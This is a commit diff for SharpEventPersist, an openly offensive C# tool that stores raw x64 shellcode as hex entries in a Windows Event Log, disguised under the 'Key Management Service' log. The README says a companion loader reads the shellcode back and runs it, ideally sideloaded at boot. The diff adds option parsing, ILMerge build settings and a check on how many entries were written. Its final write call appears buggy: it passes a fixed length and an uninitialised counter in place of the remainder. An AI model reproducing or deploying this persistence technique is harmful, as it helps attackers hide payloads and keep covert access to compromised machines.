cmdline

README.md

@@ -2,7 +2,12 @@
 Persistence by writing/reading shellcode from Event Log.  
 
 ## Usage
-Run the SharpEventPersist tool and specify path to raw x64 shell like this "execute-assembly C:\path\to\SharpEventPersist.exe C:\path\to\shellcode.bin".  
+The SharpEventPersist tool takes 4 parameters: --file "C:\path\to\shellcode.bin" --instanceid 1337 --source Persistence --eventlog "Key Management Service".  
 The shellcode is converted to hex and written to the "Key Management Service", event level is set to "Information" and source is "Persistence".  
 Run the SharpEventLoader tool to fetch shellcode from event log and execute it. Ideally this should be converted to a DLL and sideloaded on program start/boot.  
+Remember to change the Event Log name and instanceId in the loader, if not running with default values.  
+Remember to compile with ILMerge for NDesk.Options to work. I use this as Post-build event command line:  
+```powershell
+$(ProjectDir)packages\ILMerge.3.0.41\tools\net452\ILMerge.exe /target:winexe /targetplatform:"v4,C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.8" /out:$(ProjectDir)SharpEventPersist.exe $(ProjectDir)bin\Release\SharpEventPersist.exe $(ProjectDir)packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll
+```
 ![image info](./demo.png)

SharpEventPersist/Program.cs

@@ -2,48 +2,112 @@
 using System.Diagnostics;
 using System.Runtime.Remoting.Metadata.W3cXsd2001;
 using System.IO;
+using System.Linq;
+using NDesk.Options;
 
 namespace SharpEventPersist
 {
-    internal class Program
+    class Program
     {
-        static void delegate_bytes(byte[] shellcode, int length, int offset = 0)
+        public static int EventWrites = 0;
+        private static int i;
+
+        public static void PrintHelp()
+        {
+            Console.WriteLine("Required paramter: -file (shellcode path)\n");
+            Console.WriteLine("Specify -file C:\\path\\to\\shellcode.bin\nSpecify -instanceid 1337\nSpecify -source 'Persistence'\nSpecify -eventlog 'Key Management Service'");
+        }
+
+        static void delegate_bytes(string source, string instanceid, string eventlog, byte[] shellcode, int length, int offset = 0)
         {
             var temp = new byte[length];
 
             for (var i = 0; i < length; i++)
                 temp[i] = shellcode[offset + i];
 
             string shellcodeEvent = GetBytesToString(temp);
-
-            string source = "Persistence";
-            EventLog KMSEventLog = new EventLog("Key Management Service");
+            int instanceint = Int16.Parse(instanceid);
+            EventLog KMSEventLog = new EventLog(eventlog);
             if (!EventLog.SourceExists(source))
             {
-                EventLog.CreateEventSource(source, "Key Management Service");
+                EventLog.CreateEventSource(source, eventlog);
             }
             KMSEventLog.Source = source;
-            KMSEventLog.WriteEntry(shellcodeEvent, EventLogEntryType.Information, 1337);
+            KMSEventLog.WriteEntry(shellcodeEvent, EventLogEntryType.Information, instanceint);
+            EventWrites += 1;
         }
 
-        static void Main(string[] args)
+        static void Main(string [] args)
         {
 
-            if (args == null || args.Length == 0)
+            if (args == null)
             {
-                Console.WriteLine("[-] Please specify raw shellcode file");
+                PrintHelp();
                 return;
             }
+            string file = null;
+            string eventlog = null;
+            string instanceid = null;
+            string source = null;
 
-            byte[] shellcode = File.ReadAllBytes(args[0]);
+            OptionSet opts = new OptionSet()
+            {
+                { "file=", "-file [file]", v => file = v },
+                { "instanceid=", "-instanceid [instanceid]", v => instanceid = v },
+                { "source=", "-source [source]", v => source = v },
+                { "eventlog=", "-eventlog [eventlog]", v => eventlog = v }
+            };
+
+            try
+            {
+                opts.Parse(args);
+            }
+            catch (OptionException e)
+            {
+                Console.WriteLine(e.Message);
+            }
+
+            if (string.IsNullOrEmpty(file))
+            {
+                PrintHelp();
+                return;
+            }
+
+            if (string.IsNullOrEmpty(eventlog))
+                eventlog = "Key Management Service";
+            if (string.IsNullOrEmpty(source))
+                source = "Persistence";
+            if (string.IsNullOrEmpty(instanceid))
+                instanceid = "1337";
+
+            Console.WriteLine("Using shellcode: " + file);
+            Console.WriteLine("Setting event log instance id: " + instanceid);
+            Console.WriteLine("Setting event log source to: " + source);
+            Console.WriteLine("Setting event log to: " + eventlog);
+            int instanceint = Int16.Parse(instanceid);
+
+            byte[] shellcode = File.ReadAllBytes(file);
 
             var realcount = (int)(shellcode.Length / 8000);
 
             for (var i = 0; i < realcount; i++)
-                delegate_bytes(shellcode, 8000, i * 8000);
+                delegate_bytes(source, instanceid, eventlog, shellcode, 8000, i * 8000);
 
             var remainder = (int)(shellcode.Length % 8000);
-            delegate_bytes(shellcode, remainder, realcount * 8000);
+            delegate_bytes(source, instanceid, eventlog, shellcode, 8000, i * 8000);
+
+            EventLog log = new EventLog(eventlog);
+            var entries = log.Entries.Cast<EventLogEntry>().Where(x => x.InstanceId == instanceint).ToList();
+
+            if (entries.Count == EventWrites)
+            {
+                Console.WriteLine("Successfully wrote " + entries.Count + " entries to the log " + log.LogDisplayName);
+            } else
+            {
+                Console.WriteLine("Number of entires in "+ log.LogDisplayName + "does not match times the Event Write function was called. Do not expect persistence to work.");
+            }
+
+
         }
         public static string GetBytesToString(byte[] value)
         {

SharpEventPersist/SharpEventPersist.csproj

@@ -1,5 +1,6 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="packages\ILMerge.3.0.41\build\ILMerge.props" Condition="Exists('packages\ILMerge.3.0.41\build\ILMerge.props')" />
   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
   <PropertyGroup>
     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
@@ -12,6 +13,8 @@
     <FileAlignment>512</FileAlignment>
     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
     <Deterministic>true</Deterministic>
+    <NuGetPackageImportStamp>
+    </NuGetPackageImportStamp>
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
     <PlatformTarget>AnyCPU</PlatformTarget>
@@ -33,6 +36,9 @@
     <WarningLevel>4</WarningLevel>
   </PropertyGroup>
   <ItemGroup>
+    <Reference Include="NDesk.Options, Version=0.2.1.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</HintPath>
+    </Reference>
     <Reference Include="System" />
     <Reference Include="System.Core" />
     <Reference Include="System.Xml.Linq" />
@@ -41,13 +47,24 @@
     <Reference Include="System.Data" />
     <Reference Include="System.Net.Http" />
     <Reference Include="System.Xml" />
+    <Reference Include="WindowsBase" />
   </ItemGroup>
   <ItemGroup>
     <Compile Include="Program.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
   </ItemGroup>
   <ItemGroup>
     <None Include="App.config" />
+    <None Include="packages.config" />
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
+    <PropertyGroup>
+      <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
+    </PropertyGroup>
+    <Error Condition="!Exists('packages\ILMerge.3.0.41\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', 'packages\ILMerge.3.0.41\build\ILMerge.props'))" />
+  </Target>
+  <PropertyGroup>
+    <PostBuildEvent>$(ProjectDir)packages\ILMerge.3.0.41\tools\net452\ILMerge.exe /target:winexe /targetplatform:"v4,C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.8" /out:$(ProjectDir)SharpEventPersist.exe $(ProjectDir)bin\Release\SharpEventPersist.exe $(ProjectDir)packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</PostBuildEvent>
+  </PropertyGroup>
 </Project>

SharpEventPersist/packages.config

@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="ILMerge" version="3.0.41" targetFramework="net472" />
+  <package id="NDesk.Options" version="0.2.1" targetFramework="net472" />
+</packages>